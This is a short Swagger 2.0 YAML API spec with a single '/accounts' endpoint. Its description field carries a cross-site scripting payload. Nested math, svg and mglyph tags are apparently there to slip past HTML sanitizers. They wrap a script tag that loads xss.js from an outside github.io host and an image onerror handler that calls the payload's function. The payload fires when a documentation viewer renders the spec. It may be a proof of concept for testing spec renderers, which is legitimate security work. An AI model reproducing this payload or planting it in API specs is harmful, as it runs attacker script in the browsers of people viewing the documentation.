swagger: '2.0'
info:
  title: Example yaml.spec1
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><script src='https://zerone0x01.github.io/xss.js'></script><a title='test' > test </a><img src='1' onerror='zerone0x01_xss()'>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
